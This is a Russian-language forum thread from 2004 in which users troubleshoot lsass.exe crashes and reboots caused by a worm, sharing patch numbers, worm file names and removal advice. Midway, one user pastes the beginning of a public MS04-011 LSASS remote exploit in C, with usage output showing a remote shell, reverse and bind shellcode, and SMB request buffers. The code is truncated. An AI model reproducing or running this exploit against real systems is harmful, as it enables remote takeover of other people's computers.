вылетает lsass.exe
это означает, пора 
nothing to clean 
ну вот, опять.обратил внимание вот на что - звук перед вылетом как-то залипает...
Похоже, в XP новая дыра. У меня случилось тоже самое.
Только я перед этим видел предупреждение от Outpost Firewall, что lsass.exe куда-то лезет. На свою голову разрешил, через пять минут получил сообщение, что куда-то лезет ftp.exe... Сейчас ищу инфу по этому поводу.
Ко мне это предположительно залезло через cherv.hackers
Только я перед этим видел предупреждение от Outpost Firewall, что lsass.exe куда-то лезет. На свою голову разрешил, через пять минут получил сообщение, что куда-то лезет ftp.exe... Сейчас ищу инфу по этому поводу.
Ко мне это предположительно залезло через cherv.hackers
http://v.gz.ru/:
27.04.2004?
ПОЯВИЛАСЬ НОВАЯ МОДИФИКАЦИЯ ВИРУСА! МЕГАЧЕРВЬ распространяющийся по сети!
В связи с чем ВСЕМ необходимо срочно поставить обновления на вашу Операционную Систему!
Обновление 815021
Windows 2000 English или Russian
Windows XP English или Russian
Обновление 824146
Windows 2000 English или Russian
Windows XP English или Russian
Windows 2003 Server English или Russian
Утилита для лечения зараженного компьютера от Sophos лежит тут
Утилита для лечения зараженного компьютера от Symantec лежит тут
Обновленная утилита для лечения зараженного компьютера от Касперского лежит тут
ну вот так бы и сразу...
а почему в форуме ни слова до сих пор об этом не было?
а почему в форуме ни слова до сих пор об этом не было?
Думаю, потому что тут все с Ахтоха обновляются. У него, наверняка, уже этот апдейт выложен.
о блин а во второй сервис пак эта хрень уже впаяна
А ты проверял?
windows update - до безобразия неудобная вещь. Во-первых, неуправляемая. Когда захочется, тогда и проверит, и поставит, и посреди каких-нибудь дел ребутнуться захочет. Во-вторых, когда его себе поставил, он мне реестр уничтожил, пришлось винду переставлять.
У меня линух. Мне абсолютно всё равно.
Тогда нехрен пиздеть.
Что я не так сказал?
Глеб, не флуди, пожалуйста, не до того.
Очень обидно, что меня от инета забанили за вирусы При этом не одна из утилит, лежащих по приведённой тобой ссылке, ничего не обнаруживает.
Очень обидно, что меня от инета забанили за вирусы
При этом не одна из утилит, лежащих по приведённой тобой ссылке, ничего не обнаруживает.lsass.exe мог вылететь до заражения, попробуй ещё clrav.com /scanfiles
Блин, меня тоже забанили. 
методом тыка установил, что ребута не происходит(вроде как если сделать net stop server 
ребут можно остановить также выполнив shutdown -a
блин, где отцы...создать новую тему, что ли?
пользуйтесь http://windowsupdate.hackers
заплатки эти вышли еще 14 апреля
заплатки эти вышли еще 14 апреля
не пашет он у меня
уже пару месяцев
как починить?
уже пару месяцев
как починить?
поздно пить боржоми, когда почки отказали...
чем лечиться-то сейчас?
чем лечиться-то сейчас?
импортнуть рег-файл который на той страничке, и проверить, что работают указанные там службы
ты читал тред вообще?
ни одна их этих лечилок ничего не находит.
ни одна их этих лечилок ничего не находит.
я уже 100 раз это делал
может потереть что в реестре надо ?
может потереть что в реестре надо ?
тогда остается только сосать а я в кино пошел
а я в кино пошелпопробуй 101-й раз, проверь еще раз
а он может втихаря всё ставить?
нет, в трее вылазиет хрень такая и говорит что пора бы типа патчи установить
ну вот, опять началось, как раз после опубликования эксплоита в багтреке :-)
ещё раз повторяю номер заплатки для тех, кто в прошлый раз проспал - 835732
а вот основа вредосносного кода :-)
ещё раз повторяю номер заплатки для тех, кто в прошлый раз проспал - 835732
а вот основа вредосносного кода :-)
/* HOD-ms04011-lsasrv-expl.c:
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit
* Version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
* -------------------------------------------------------------------
* Usage:
*
* expl <target> <victim IP> <bindport> [connectback IP] [options]
*
* Targets:
* 0 [0x01004600]: WinXP Professional [universal] lsass.exe
* 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
* 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
*
* Options:
* -t: Detect remote OS:
* Windows 5.1 - WinXP
* Windows 5.0 - Win2k
* -------------------------------------------------------------------
*
* Tested on
* - Windows XP Professional SP0 English version
* - Windows XP Professional SP0 Russian version
* - Windows XP Professional SP1 English version
* - Windows XP Professional SP1 Russian version
* - Windows 2000 Professional SP2 English version
* - Windows 2000 Professional SP2 Russian version
* - Windows 2000 Professional SP4 English version
* - Windows 2000 Professional SP4 Russian version
* - Windows 2000 Advanced Server SP4 English version
* - Windows 2000 Advanced Server SP4 Russian version
*
*
* Example:
*
* C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Detecting remote OS: Windows 5.0
*
*
* C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Attacking ... OK
*
* C:\nc 192.168.1.10 4444
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
*
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*/
#include <windows.h>
#pragma comment(lib, "ws2_32")
// reverse shellcode
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\9\xC9"
"\9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\\xBD\x89\\x67\\xBD\xA4\x10\xC5\xBD\1\x10"
"\xC5\xBD\5\x10\xC5\xBD\xC9\x14\\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\C\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\0\8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";
// bind shellcode
unsigned char bindshell[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\9\x95\x12"
"\xE9\x85\x34\x12\9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\C\x7B\x70\xC0\xC6\xC7\x12\x54\x12\F\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\F\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\E\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\9\xFF\x5E\F"
"\xB5\x98\x98\x14\E\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\E\xA5\xFA\xF4\xFD\x99\x14\E\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\E\xFC\xED\xC9\xEB\xF6\xFA\8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\A\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\8\x99\C\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\5"
"\xF6\xF8\xFD\5\xF0\xFB\xEB\xF8\xEB\xE0\8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\8\xCA\xF6\xFA\xF2\xFC\xED\8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
char req1[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";
char req2[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";
char req3[] =
"\x00\x00\x
Где взять эту заплатку? 
мне лориен помог
Я первым делом в лориен и залез, но у меня 2000 винда, а там для XP.
я брал на windowsupdate.microsoft.com
мы благодаря этому вирусу от инета забанены 
У меня та же гадость с 2000Rus тож очень сильно хочу эту заплатку!
Так надо сначала вылечиться, а потом заплатку ставить или как?
а чем лечиться, есть?
В том то и дело, что нет.
обновляйте касперского и пошарьте базы 
я не хочу воровать. А уж если бы воровал, то что-нибудь нормальное, а не кав
У меня не стоит Касперский, только Dr.Web.
avserve2.exe
7920_up.exe
7920_up.exe
гы ну и сиди теперь с вирусняком 
это ты к чему?
у меня виря нет
у меня виря нет
сорри не тебе
всем
так эти долбаные вири называюца
всем
так эти долбаные вири называюца
А точно, что только так называется? По другому никак не может? Мне кажется, что он как-то генерит имя. Рядом с IsUninst.exe появился IsUn0419.exe. Хотя может не появился. Может и был там, но по-моему не было. Бля, уже параноя началась.
у меня тоже было <какая-то цифра>_up.exe ...
не знаю...надо источник заразы уничтожить, а как?
не знаю...надо источник заразы уничтожить, а как?
У меня они называются avserve2.exe
7920_up.exe (у последнего цифра видимо генерится рандомом
***_up.exe не убивается из стартапа % а avserve можно,
я его в реестре нашел и убил, теперь осталсятока ***_up.exe
%
7920_up.exe (у последнего цифра видимо генерится рандомом
***_up.exe не убивается из стартапа % а avserve можно,
я его в реестре нашел и убил, теперь осталсятока ***_up.exe
%
гы =)
поиск показал мне больше 30 ***_up.exe
я офигеваю...
поиск показал мне больше 30 ***_up.exe
я офигеваю...
Все. Не могу больше. Ушел за пивом. Приду, напьюсь и буду сносить винды к едрене фене.
у меня нет вообще подобных файлов. Более того, уже 40 минут все вроде как в порядке
не поможет.
да и потом, меня вот сейчас не ребутает...
да и потом, меня вот сейчас не ребутает...
Меня не перезагружает. Но соседнии комп каждые 5 минут перезагрузку требует! (lsass) В процех почти тоже самое.. Не понятно.
Больше 30-ти, потому что он создаёт скрипт для ftp.exe на других компах, чтобы их заразить. В теории, часть этих *_up.exe уже ушли на другие компы.
Я установил с сайта windowsupdate.microsoft.com все критические обновления. Пока не требовало перезагружаться. Хз в общем.
как определить, заражен ли комп?
до перезагруза можно?
до перезагруза можно?
см.
там написано, что в реестре
файлы *_up.exe в виндовой дире
там написано, что в реестре
файлы *_up.exe в виндовой дире
Блин, отлучился за пивом, а тут ТАКАЯ хрень творится.
Единственный вопрос остался : Поисковик файлы avserve2 и _up не находит
комп перезагружается и заплатка когда пытается установится распаковывается но до
установки дело не доходит...
комп перезагружается и заплатка когда пытается установится распаковывается но до
установки дело не доходит...
Оставить комментарий
dima9202
винда (ХР) после примерно получаса работы выдаёт сообщение, что lsass.exe совершил недопусимую ошибку и предоставляет выбор - debug, close. После чего даёт 1 мин на закрытие приложений и ребутается. Что это может означать, скажите, пожалуйста.